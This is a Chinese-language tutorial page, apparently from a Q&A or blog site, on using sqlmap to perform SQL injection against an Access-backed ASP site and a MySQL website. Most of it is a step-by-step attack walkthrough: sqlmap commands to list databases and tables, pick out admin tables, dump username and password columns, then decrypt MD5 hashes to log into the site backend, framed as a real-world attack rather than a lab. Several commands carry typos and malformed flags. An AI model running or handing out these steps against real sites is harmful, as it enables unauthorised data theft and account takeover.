sqlmap怎么注入ACCESS数据库

Posted 2023-05-06

参考技术A 方法/步骤
首先我们先来跑表
命令是sqlmap –u “url/NewsShow.asp?id=69” –tables

一路上大家遇到这个

可以直接选择回车
等到了这里

大家选择线程1到10
开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表

然后我们直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin

然后得到了里面的字段username password id
然后我们直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”

然后一路还是回车。到了

还是选择线程1到10
最后跑出了用户名。密码

9

实战|SQL注入攻击网站

SQL注入

Access数据库攻击

SQL数据库注入

一：获取数据库类型

sqlmap -u http://xxx.com –dbs

获得的信息：linux服务器系统为cenos 5.10

Apacher php 的版本 数据库类型为sql

二，获取数据库中的数据库

sqlmap -u http:xxx.com --dbms mysql--level 3 –dbs

OK，当前数据库中有两个数据库，目测sq_kffc200为当前网站的系统！（做过网站都知道的）

三，

从当前数据库中获取表段

sqlmap -uhttp://www.xxx.com --dbmsmysql --level 3 -D sq_kyfc200 –tables

Ok 我们可以看到有很多表头 怎么办？

没事我们找关键字（含有admin开头的全部搞上去！）

四：获取admin表中的字段

sqlmap -u http://www.xxx.com--dbms mysql --level 3 -D sq_kyfc200 -T "boc_admin_user,boc_admin_user,ky_admin"–columns

获取到的表段：还是关键字password username 等

五，获取表和字中的密码：

sqlmap -uhttp://www.xxx.com --dbms mysql--level 3 -D sq_kyfc200 -T "boc_admin_user,boc_admin_user,ky_admin" -C"login_count,password,qq,tel" –dump

OK 获得MD5加密的密文 解密登录后台

获取更多原创教程 扫码关注即可